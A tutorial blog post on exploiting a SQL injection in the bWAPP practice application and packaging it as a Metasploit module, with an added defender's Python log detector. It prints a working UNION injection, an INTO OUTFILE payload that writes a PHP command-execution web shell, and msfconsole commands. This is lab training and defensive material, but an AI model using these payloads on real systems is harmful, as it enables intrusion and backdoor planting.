Hi little bees,
In this article, I'll show you how you can find an exploit in bWAPP and port it to a Metasploit module to ease the exploitation of your loved bee-box (or any bWAPP aware box).

You probably all know the Metasploit Framework. If you don't know it yet, you should absolutely take a look at its website and download/install it. If you're using Kali Linux, Metasploit is already present in your beehive.
First, we need to find a valid exploit. For now, I'll take a basic SQL injection to spawn a shell/meterpreter on the box. I'm a little lazy and the basics of SQL injection are out of scope, so if you don't know how to exploit it in bWAPP you can still refer to my (killed in the beehive) bwappexploited site.
So, starting from the fact that this injection works well to get the current database:

' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
We could abuse the SELECT INTO OUTFILE MySQL statement to write a PHP file, our backdoor, to the webserver. But don't forget you're injecting into MySQL, so the mysql user or a group it belongs to must have write permissions on the folder where you want to write the backdoor. An image or document folder is often a good choice, as it is often used to upload images through an admin web interface. In this case, the « images » folder is writable :) (http://yourip/bWAPP/images/)
Our payload could be something like this:

a' UNION SELECT 1, "<?php system($_GET['cmd']) ?>",1,1,1,1,1 INTO OUTFILE "/var/www/bWAPP/images/yabadooo.php" -- -

Of course, change the path if bWAPP is installed in another directory.
If our injection worked, a file named yabadooo.php containing our payload is present in the « images » folder. Let's abuse it with the « id » command to see which user serves our payload.

It worked ! But ... you already knew it ? ;)
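A defender's counterpart to the two requests above, added here and not part of the original post: a check over web server access log lines that flags the UNION SELECT ... INTO OUTFILE injection, remembers the file path it tried to write, and then flags later hits on that dropped file. The log lines are constructed; the injection endpoint and parameter name are placeholders, and the web root /var/www is an assumption taken from the OUTFILE path used above.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format: client, timestamp, request line, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')
# UNION SELECT ... INTO OUTFILE "<path>", tolerant of case and whitespace
OUTFILE_RE = re.compile(
    r"union\s+(?:all\s+)?select\b.*?\binto\s+outfile\s+['\"]([^'\"]+)['\"]",
    re.IGNORECASE | re.DOTALL)

DOCUMENT_ROOT = "/var/www"  # assumed web root; the OUTFILE path above sits under it

# Constructed log lines: a normal search, the injection (URL-encoded form of
# the post's payload; endpoint and parameter name are placeholders), the
# first hit on the dropped file, and an unrelated image request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2024:10:00:01 +0000] "GET /bWAPP/inject1.php?title=Iron+Man HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jun/2024:10:00:07 +0000] "GET /bWAPP/inject1.php?title=a%27+UNION+SELECT+1%2C+%22%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29+%3F%3E%22%2C1%2C1%2C1%2C1%2C1+INTO+OUTFILE+%22%2Fvar%2Fwww%2FbWAPP%2Fimages%2Fyabadooo.php%22+--+- HTTP/1.1" 200 4870
10.0.0.9 - - [01/Jun/2024:10:00:12 +0000] "GET /bWAPP/images/yabadooo.php?cmd=id HTTP/1.1" 200 61
10.0.0.5 - - [01/Jun/2024:10:00:20 +0000] "GET /bWAPP/images/bee_1.png HTTP/1.1" 200 23040
"""

def detect(log_text, document_root=DOCUMENT_ROOT):
    """Return (client, kind, detail) tuples in log order: "sqli_into_outfile"
    with the path the statement tried to write, or "webshell_access" with
    the request that reached that file."""
    findings, dropped = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        client, _ts, _method, target, _status = m.groups()
        parts = urlsplit(target)
        # Decode the whole query once: the payload arrives percent-encoded
        hit = OUTFILE_RE.search(unquote_plus(parts.query))
        if hit:
            path = hit.group(1)
            findings.append((client, "sqli_into_outfile", path))
            if path.startswith(document_root + "/"):
                # Map the filesystem path to the URL path it is served at
                dropped.add(path[len(document_root):])
        elif parts.path in dropped:
            req = parts.path + ("?" + parts.query if parts.query else "")
            findings.append((client, "webshell_access", req))
    return findings

if __name__ == "__main__":
    for client, kind, detail in detect(SAMPLE_LOG):
        print(client, kind, detail)
```

The write itself fails outright when MySQL's secure_file_priv confines INTO OUTFILE to a dedicated directory and the web root is not writable by the mysql user; this log check complements that hardening rather than replacing it.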
To build a Metasploit module, you have to answer this question: which steps were necessary to successfully exploit? In our case it's rather simple:

1 – Login to bWAPP
2 – Post evil parameters to inject1.php
Here's the first step in detail:

As you can see, we first connect to bWAPP to store the session cookie, then we use this cookie to log in to bWAPP. Finally, in the second step, we call the hive function to log in, then we send the evil request to get our shell. Metasploit generates the payload for us: just replace the PHP commands in the SQL injection with « payload.encoded » and let MSF do its job.

The big part of the job is done; you'll understand the meaning of it all while reading, I let you explore the final script.
You'll find the msf module here, just copy/paste it in the MSF modules folder. Kali users can drop it in /usr/share/metasploit-framework/modules/exploits/multi/http/.
Start msfconsole and type:

> use exploit/multi/http/bwapp-sqli
> set RHOST <bWAPP IP ADDRESS>
> exploit -j

And magic happens :)
That's all bees,
Thanks for reading !

David Bloom
Twitter : @philophobia78